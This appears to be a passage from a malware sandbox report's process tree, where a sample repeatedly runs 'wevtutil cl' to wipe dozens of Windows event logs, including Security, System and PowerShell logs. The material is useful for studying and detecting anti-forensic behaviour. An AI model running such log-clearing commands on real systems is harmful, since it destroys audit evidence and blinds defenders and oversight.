C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/FirewallVerbose"3⤵PID:1108
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WindowsBackup/ActionCenter"3⤵PID:436
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WindowsColorSystem/Debug"3⤵PID:1932
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WindowsColorSystem/Operational"3⤵PID:1048
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WindowsSystemAssessmentTool/Operational"3⤵PID:1800
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WindowsSystemAssessmentTool/Tracing"3⤵PID:892
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WindowsUpdateClient/Operational"3⤵PID:1212
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Wininit/Diagnostic"3⤵PID:668
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Winlogon/Diagnostic"3⤵PID:952
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Winlogon/Operational"3⤵PID:1532
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Winsock-AFD/Operational"3⤵PID:1232
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Winsock-WS2HELP/Operational"3⤵PID:564
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Winsrv/Analytic"3⤵PID:1312
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Wired-AutoConfig/Diagnostic"3⤵PID:336
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Wired-AutoConfig/Operational"3⤵PID:756
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Wordpad/Admin"3⤵PID:820
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Wordpad/Debug"3⤵PID:360
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Wordpad/Diagnostic"3⤵PID:1384
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-mobsync/Diagnostic"3⤵PID:684
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ntshrui"3⤵PID:1144
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-osk/Diagnostic"3⤵PID:524
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-stobject/Diagnostic"3⤵PID:972
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "OAlerts"3⤵PID:1864
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Security"3⤵PID:1972
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Setup"3⤵PID:1116
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "System"3⤵PID:1788
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "TabletPC_InputPanel_Channel"3⤵PID:1456
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "WINDOWS_MP4SDECD_CHANNEL"3⤵PID:1180
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "WINDOWS_MSMPEG2VDEC_CHANNEL"3⤵PID:1600
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "WINDOWS_WMPHOTO_CHANNEL"3⤵PID:1952
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "WMPSetup"3⤵PID:876
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "WMPSyncEngine"3⤵PID:1928
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Windows PowerShell"3⤵PID:812
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "microsoft-windows-RemoteDesktopServices-RemoteDesktopSessionManager/Admin"3⤵PID:1664
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "muxencode"3⤵PID:292
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl3⤵PID:788
-
-